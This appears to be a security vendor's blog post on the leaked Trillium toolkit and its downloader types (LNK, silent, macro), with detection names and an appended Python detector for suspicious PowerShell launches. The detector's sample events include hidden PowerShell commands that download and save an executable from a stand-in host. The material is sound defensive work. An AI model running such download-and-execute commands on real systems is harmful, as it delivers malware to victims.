Trillium Toolkit Leads to Widespread Malware

Any aspiring cybercriminal can buy one of many malicious toolkits to craft a downloader and distribute malware. After a time these downloaders are leaked to forums and other download sites and become available to the masses. This is often when we see a spike in their use.

The toolkit Trillium Security MultiSploit Tool v3 was cracked last week and uploaded onto several malicious forums.


Trillium was created by a coder using the same name. The program contains a EULA that mentions it should not be used maliciously, but we are well aware that these types of kits are used for generating malware.


In order to use the builder, the user needs to acknowledge the EULA by clicking on a button. So we guess everyone who is using it is violating the policy.

Whenever you use the tool to create an exploit or a downloader you are reminded yet again not to use it maliciously.


Version 1 of this tool appeared for sale at the end of last year for US$300 on a popular hacking forum. Since then, it has been updated to Version 3.


This toolkit allows the user to create several types of downloaders. It breaks them down into three options:

  • Windows shortcut exploits
  • Silent exploit
  • Macro exploits

Windows shortcut exploits rename an executable to a specified filename and create a LNK file that uses PowerShell to execute.


This type offers the option to use different icons and file extensions, all to trick the target into executing the LNK file.

A silent exploit creates a file that downloads and executes a specified file from the Internet. The users have the option to create the following file types:

*.chm, *.wsf, *.vbs, *.hta, *.htm, *.html, *.bat, *.cmd, *.ps1, *.psc1, *.exe, *.pif, *.scr, *.com, *.url, *.lnk

Depending on the chosen options, the toolkit will create one of the following files:

  • A PowerShell script
  • A Visual Basic executable
  • A Visual Basic script

The PowerShell script, executed as hidden, downloads and runs a file.


The Visual Basic executable downloads and executes a file.


The Visual Basic script again downloads and executes a file.


Macro exploits allow users to create a macro that will download and execute a file. This type of attack is very common today; we have seen it used to spread Dridex and other ransomware families. The tool can create several macro versions, for example:


We have already observed this toolkit being used to distribute malware. We have seen spam campaigns using the macro exploit component, for example:


McAfee has several drivers that detect the files created by this toolkit. Detection is included in DAT Versions 8094 and later.

  • Trojan-FHYT
  • Trojan-FHYU
  • W97M/Downloader.azi
  • W97M/Downloader.azj
  • W97M/Downloader.azk

We also recommend our customers read this blog containing preventive measures against Dridex. The advice should help mitigate some of the infections caused by malware created by this toolkit.
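Signature names aside, the downloaders described above share behavior that can be checked in process-creation logs: a script host started by an Office application, and PowerShell started with a hidden window that fetches a file. The following Python sketch is an added example, not code from this post, from McAfee, or from the toolkit; the event field names (`parent`, `image`, `cmdline`), the reason labels, and the sample events are assumptions constructed for illustration.

```python
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
DOWNLOAD = re.compile(r"downloadfile|downloadstring|net\.webclient|invoke-webrequest|start-bitstransfer", re.I)
# "-name value" pairs; the lookahead leaves the value free to start the next pair.
PARAM = re.compile(r"(?:^|\s)[-/](\w+)(?=\s+(\S+))")

def basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def decode_encoded(value):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text); '' if invalid."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-16-le")
    except ValueError:
        return ""

def score(event):
    """Return the reasons a process-creation event resembles a downloader launch."""
    image, parent = basename(event["image"]), basename(event["parent"])
    reasons = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        reasons.append("office-spawned-script-host")  # macro document case
    if image == "powershell.exe":
        text = event["cmdline"]
        for name, value in PARAM.findall(text):
            name = name.lower()  # powershell.exe accepts abbreviated names (-w, -enc)
            if "windowstyle".startswith(name) and value.lower() in ("hidden", "1"):
                reasons.append("hidden-window")
            elif "encodedcommand".startswith(name) or name == "ec":
                reasons.append("encoded-command")
                text += " " + decode_encoded(value)  # inspect the decoded script too
        if DOWNLOAD.search(text):
            reasons.append("network-download")
    return reasons

# Constructed sample events (not taken from the toolkit or from real telemetry).
_ENC = base64.b64encode("Invoke-WebRequest http://example.test/a -OutFile a.exe".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://example.test/a.exe','a.exe')\""},
    {"parent": r"C:\Windows\explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -enc " + _ENC},
    {"parent": r"C:\Windows\explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]
```

Calling `score()` on each entry of `SAMPLE_EVENTS` returns a list of reasons for the first two events and an empty list for the third. This is a heuristic: it will not see downloads performed by the Visual Basic executable or by script content stored in a file.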
